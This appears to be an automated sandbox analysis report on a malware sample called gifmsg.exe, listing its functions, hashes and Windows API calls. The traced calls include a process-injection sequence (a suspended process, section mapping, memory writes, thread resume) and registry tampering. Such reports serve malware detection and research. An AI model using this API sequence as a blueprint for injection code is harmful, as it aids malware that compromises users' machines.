  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E144C, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 49 Total matches: 9memory
Similarity
  • Total matches: 9
  • API ID: HeapFreeStrStrI
  • String ID: pnls
  • API String ID: 4137399961-141991303
  • Opcode ID: 4aa7b909af106ac1487055971ad23c5d9ff314578936fa2f1abc21ea428e854d
  • Instruction ID: a541ced8c8c75d727343971dda9e244897b1605c7a85f4116a33065e88e68885
  • Opcode Fuzzy Hash: E6D095824D6F9B47C9517014971DE702580FF430D3D9B726405C1434515F00301F1D1D
  • Instruction Fuzzy Hash: a541ced8c8c75d727343971dda9e244897b1605c7a85f4116a33065e88e68885
APIs
    • Part of subcall function 002E47D3: memcpy.NTDLL(00000004,?,?,?,00000000), ref: 002E48C3
  • HeapFree.KERNEL32(00000000,?,?), ref: 002E14BE
    • Part of subcall function 002E3D12: GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,002E1499,?,002E7494,pnls,00000000,002E618C,0000000C), ref: 002E3D27
    • Part of subcall function 002E3D12: GetSystemDefaultUILanguage.KERNEL32(?,?,002E1499,?,002E7494,pnls,00000000,002E618C,0000000C,?,?,?,002E1800,00000000,?,002E7494), ref: 002E3D31
  • StrStrIA.SHLWAPI(00000000,002E7494), ref: 002E14A4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: gifmsg.exe Analysis ID: 60136

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:5BDD37EDD3740A4E2DA2E05ABDC20A20
Total matches:34
Initial Analysis Report:Open
Initial sample Analysis ID:60136
Initial sample SHA 256:3D61067831E54523401557F16F776796142F313F41B2B12D48B017A7E06B48DD
Initial sample name:gifmsg.exe

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime
Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
